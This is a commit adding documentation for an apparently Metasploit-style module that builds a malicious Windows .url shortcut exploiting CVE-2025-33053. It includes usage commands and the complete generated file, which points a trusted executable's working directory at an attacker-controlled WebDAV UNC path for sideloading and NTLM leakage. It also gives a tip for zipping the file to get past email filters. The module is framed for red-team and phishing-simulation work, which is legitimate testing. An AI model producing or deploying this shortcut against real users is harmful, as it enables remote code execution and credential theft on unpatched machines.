Add module documentation for CVE-2025-33053 URL generator

DevBuiHieu · DevBuiHieu · commit 98389f2889a1 · 2025-06-13T20:35:38.000-04:00
diff --git a/documentation/modules/auxiliary/gather/cve_2025_33053.md b/documentation/modules/auxiliary/gather/cve_2025_33053.md
@@ -0,0 +1,82 @@
+## Overview
+
+This module generates a malicious `.url` Internet Shortcut file that abuses CVE-2025-33053 — a vulnerability in how Windows handles `.url` files referencing remote UNC paths (e.g., WebDAV shares).
+
+When the generated `.url` file is opened on a vulnerable Windows machine, it causes the system to connect to the specified UNC path, potentially triggering remote code execution depending on the environment and payload hosted at the target.
+
+The shortcut uses a trusted executable (e.g., iediagcmd.exe) and sets its working directory to a UNC path controlled by the attacker.
+
+## Module Information
+
+**Module Name**: auxiliary/gather/cve_2025_33053  
+**Authors**:  
+- DevBuiHieu    
+
+**Disclosure Date**: 2025-06-11  
+**License**: MSF_LICENSE  
+**Rank**: Normal
+
+## Options
+
+| Name        | Required | Description                                                             | Default Value                                                 |
+|-------------|----------|-------------------------------------------------------------------------|---------------------------------------------------------------|
+| IP          | yes      | The attacker IP address or domain used to generate the UNC path         | N/A                                                           |
+| SHARE       | no       | WebDAV share name used in UNC path                                      | `webdav`                                                      |
+| OUTFILE     | no       | Output filename of the generated `.url` file                            | `bait.url`                                                    |
+| EXE         | no       | Trusted executable to trigger (LOLBAS technique)                        | `C:\Program Files\Internet Explorer\iediagcmd.exe`            |
+| ICON        | no       | Icon file shown in `.url` properties                                    | `C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe`|
+| INDEX       | no       | Icon index to use                                                       | `13`                                                          |
+| MODIFIED    | no       | Timestamp-like hex value for `.url` metadata                            | `20F06BA06D07BD014D`                                          |
+
+## Scenarios
+
+This module can be used in phishing simulations or red team engagements where you want to:
+
+- Deliver `.url` shortcut files that point to remote UNC WebDAV shares
+- Trigger Windows to authenticate to your WebDAV server (NTLM leak)
+- Leverage DLL hijacking or EXE sideloading via UNC path
+- Test user awareness or email filtering against `.url` payloads
+
+## Example Usage
+
+```
+use auxiliary/gather/cve_2025_33053
+set IP 192.168.1.100
+run
+```
+
+Optionally:
+
+```
+set SHARE payloads
+set EXE "C:\Program Files\Internet Explorer\iediagcmd.exe"
+set OUTFILE bait.url
+run
+```
+
+## Output
+
+Creates a file like:
+
+```
+[InternetShortcut]
+URL=C:\Program Files\Internet Explorer\iediagcmd.exe
+WorkingDirectory=\\192.168.1.100\webdav\
+ShowCommand=7
+IconIndex=13
+IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+Modified=20F06BA06D07BD014D
+```
+
+## References
+
+- https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept
+- https://nvd.nist.gov/vuln/detail/CVE-2025-33053
+- https://lolbas-project.github.io
+- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053
+
+## Notes
+
+- WebDAV server must be accessible to the victim (port 80 open)
+- Windows Defender or SmartScreen may block behavior in patched systems
+- `.url` files may need to be zipped to bypass email filters
